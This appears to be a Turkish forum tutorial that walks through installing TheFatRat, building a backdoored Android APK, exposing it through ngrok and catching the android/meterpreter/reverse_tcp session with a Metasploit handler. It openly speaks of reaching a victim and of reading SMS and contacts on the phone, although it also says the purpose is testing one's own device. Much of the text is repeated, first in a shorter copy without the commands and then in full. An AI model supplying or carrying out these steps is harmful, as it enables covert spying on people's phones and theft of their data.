Selamlar, bildiğiniz gibi TheFatRat ile çoğu işletim sistemine veya dosya türüne rat yapabiliyoruz. Şimdi android için TheFatRat kullanarak rat oluşturmayı ve kurbana ulaşmayı göstereceğim. Böylelikle kendi sisteminizin veya cihazınızın güvenliğini test edebilirsiniz.Cihaz üzerinde uygulama yükleme,açma,sms çekme,bilgileri dinleme,yönlendirme yapma,rehber kaydı...gibi birçok bilgiyi görebilir veya kullanabilirsiniz
İndirme Ve Kurma İşlemi
Kod:
[SIZE="3"][COLOR="Lime"]git clone https://github.com/Screetsec/TheFatRat.git[/COLOR][/SIZE]
Kod:
[SIZE="3"][COLOR="Lime"]cd TheFatRat[/COLOR][/SIZE]
Kod:
[SIZE="3"][COLOR="Lime"]chmod +x setup.sh && ./setup.sh[/COLOR][/SIZE]
Mevcut Olanı Güncelleme
Kod:
[SIZE="3"][COLOR="Lime"]cd TheFatRat[/COLOR][/SIZE]
Kod:
[SIZE="3"][COLOR="Lime"]./update && chmod +x setup.sh && ./setup.sh[/COLOR][/SIZE]
➣İşlemden önce root yetkisi alın
➣İndirme işleminden sonra
Kod:
#cd TheFatRat
Kod:
#ls
☠komutlarımızı giriyoruz
☠Daha önce kurulum yapmamış iseniz;
veya
☠Burada bir işlem yapmamıza gerek yok sadece bekliyoruz kurulum yapıyor
➣Kurulum tamamlandıktan sonra veya direkt olarak çalıştırmak için
veya
➥Kısa bir süre dosyalarını kontrol edecek
☠Burada vt eklememizi söylüyor,burayı geçelim
➣Devam
➣Kurulum ve açılış tamamlandı
☠Biz apk dosyası oluşturacağımız için
➣Burada bizden ip adresi ve port istiyor
☠Eğer ağ üzerinde kullanacaksanız "yeni komut açıp"
☠Daha önce kurulum yapmamış iseniz;
Kod:
[SIZE="3"][COLOR="Lime"]
#bash setup.sh[/COLOR][/SIZE]
veya
Kod:
[SIZE="3"][COLOR="Lime"]
./setup.sh[/COLOR][/SIZE]
☠Burada bir işlem yapmamıza gerek yok sadece bekliyoruz kurulum yapıyor
➣Kurulum tamamlandıktan sonra veya direkt olarak çalıştırmak için
Kod:
[SIZE="3"][COLOR="Lime"]fatrat[/COLOR][/SIZE]
veya
Kod:
[SIZE="3"][COLOR="Lime"]./fatrat[/COLOR][/SIZE]
➥Kısa bir süre dosyalarını kontrol edecek
☠Burada vt eklememizi söylüyor,burayı geçelim
➣Devam
➣Kurulum ve açılış tamamlandı
Kod:
"1" diyoruz
☠Biz apk dosyası oluşturacağımız için
Kod:
[SIZE="3"]
3[/SIZE]
➣Burada bizden ip adresi ve port istiyor
☠Eğer ağ üzerinde kullanacaksanız "yeni komut açıp"
Kod:
ifconfig
➣Yazarak ip adresinizi görebilirsiniz
☠Port kısmını tercih edilmeyen bir portu yazarak bu işlemi tamamlayabilirsiniz
Veya
➣Burada "ngrok" kullanabiliriz. Size verdiği "tcp.ngrok." kısmı ve yine programdan verdiği portu kullanacaksınız
Not: İşlem boyunca ngrok kapatmayın. Kapatırsanız hata alırsınız
➣Buradan apk'ya isim vermemizi istiyor.İstediğinizi yazın
➣Şimdi bizden bir payload seçmemizi istiyor
☠"3" dedikten sonra bekliyoruz ayarlamaları yapıyor
➣Burada kısayol oluşturayım mı tarzı bir şey diyor buna no diyelim
☠Buraya kadar artık bununla işlemimiz bitti
☠isterseniz oluşturduğunuz apk dosyasını istediğiniz yere taşıyabilirsiniz örnek:
☠Şimdi msfconsole geçeceğiz lakin siz daha farklı araçlar kullanabilirsiniz örnek olarak armitage..vs dinleme için
devamında
☠Devamında
➣Burada hostumuzu sordu
☠ngrok üzerinden gerekli bilgilerimizi alıyoruz
☠Ardından oluşturduğumuz apk dosyasını bir cihazımıza kuruyoruz
☠Bağlantının olduğundan emin olmayı ihmal etmeyelim
devamında
☠Sadece bekliyoruz
İşlemimiz tamamdır
Şimdi cihaz üzerinde neler yapabileceğimizi veya komutların hepsine erişmek için:
☠Burada tüm yapabileceklerinizi komutları ile beraber görebilirsiniz. Böylelikle cihazınızın güvenliğini test etmiş oldunuz.Okuduğunuz için teşekkür ederim
☠Port kısmını tercih edilmeyen bir portu yazarak bu işlemi tamamlayabilirsiniz
Veya
➣Burada "ngrok" kullanabiliriz. Size verdiği "tcp.ngrok." kısmı ve yine programdan verdiği portu kullanacaksınız
Not: İşlem boyunca ngrok kapatmayın. Kapatırsanız hata alırsınız
➣Buradan apk'ya isim vermemizi istiyor.İstediğinizi yazın
➣Şimdi bizden bir payload seçmemizi istiyor
Kod:
3
☠"3" dedikten sonra bekliyoruz ayarlamaları yapıyor
➣Burada kısayol oluşturayım mı tarzı bir şey diyor buna no diyelim
Kod:
n
☠Buraya kadar artık bununla işlemimiz bitti
☠isterseniz oluşturduğunuz apk dosyasını istediğiniz yere taşıyabilirsiniz örnek:
Kod:
mv "apk yeri" "taşımak istediğiniz yer"
☠Şimdi msfconsole geçeceğiz lakin siz daha farklı araçlar kullanabilirsiniz örnek olarak armitage..vs dinleme için
Kod:
use exploit/multi/handler
devamında
Kod:
set payload android/meterpreter/reverse_tcp
☠Devamında
Kod:
show options
➣Burada hostumuzu sordu
☠ngrok üzerinden gerekli bilgilerimizi alıyoruz
Kod:
set LHOST 0.0.0.0
☠Ardından oluşturduğumuz apk dosyasını bir cihazımıza kuruyoruz
☠Bağlantının olduğundan emin olmayı ihmal etmeyelim
devamında
Kod:
run
☠Sadece bekliyoruz
İşlemimiz tamamdır
Şimdi cihaz üzerinde neler yapabileceğimizi veya komutların hepsine erişmek için:
Kod:
help
☠Burada tüm yapabileceklerinizi komutları ile beraber görebilirsiniz. Böylelikle cihazınızın güvenliğini test etmiş oldunuz.Okuduğunuz için teşekkür ederim